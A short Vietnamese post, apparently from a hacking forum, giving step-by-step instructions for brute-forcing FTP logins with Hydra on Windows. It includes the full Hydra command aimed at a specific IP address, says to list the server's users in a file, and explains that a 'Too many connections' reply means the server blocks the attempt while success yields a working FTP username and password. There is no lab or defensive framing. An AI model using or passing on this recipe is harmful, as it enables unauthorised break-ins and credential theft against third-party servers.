Thường thì dùng shell để đoán pass loạn tử cung
Bây h cũng đoán pass,nhưng = hydra
Download -> giải nén vào ổ C:\ -> thư mục C:\hydra
Windown + R -> cmd
cd C:\hydra
hydra -L abc.txt -P pass.txt -e ns 112.78.2.4 ftp
edit thư mục abc.txt -> các user trên sv
112.78.2.4 : ip sv
Nếu sv chặn việc brute thì hiện
Too many connections
Còn ko thì sẽ nhận đc user+pass ftp